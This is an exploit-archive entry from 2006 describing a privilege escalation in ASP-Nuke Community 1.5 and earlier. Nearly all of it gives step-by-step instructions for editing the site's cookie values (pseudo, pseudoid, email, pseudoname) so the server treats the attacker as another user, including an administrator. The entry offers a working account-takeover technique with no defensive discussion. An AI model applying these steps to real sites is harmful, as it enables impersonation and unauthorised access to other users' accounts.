ASP-Nuke Community <= 1.5 Cookie Privilege Escalation Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ASP-Nuke Community <= 1.5 Cookie Privilege Escalation Vulnerability
# Published : 2006-11-25
# Author : ajann
# Previous Title : Basic Forum <= 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Next Title : Exhibit Engine <= 1.22 (styles.php) Remote File Include Vulnerability

**************************************************************************************************
# Title  :  ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability
# Author :  ajann
# S.Page :  http://www.rot.dk
# D.Page :  http://www.rot.dk/aspnuke/downloads.asp
# Greetz :  Nukedx
**************************************************************************************************

 Cookie
----------

Open the Cookie Editor=>
Find cookie informations.
Change Informations=

Cookie Informations:

ASPNUKE14%5Fpseudoname , pseudoname => "Welcome *USERNAME*" see for
ASPNUKE14%5Fpseudo     , pseudo     =>  Login UserName
ASPNUKE14%5Fpseudoid   , pseudoid   =>  UserId
ASPNUKE14%5Femail      , email      =>  User Email

Save and go to default.asp.


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# www.Syue.com [2006-11-25]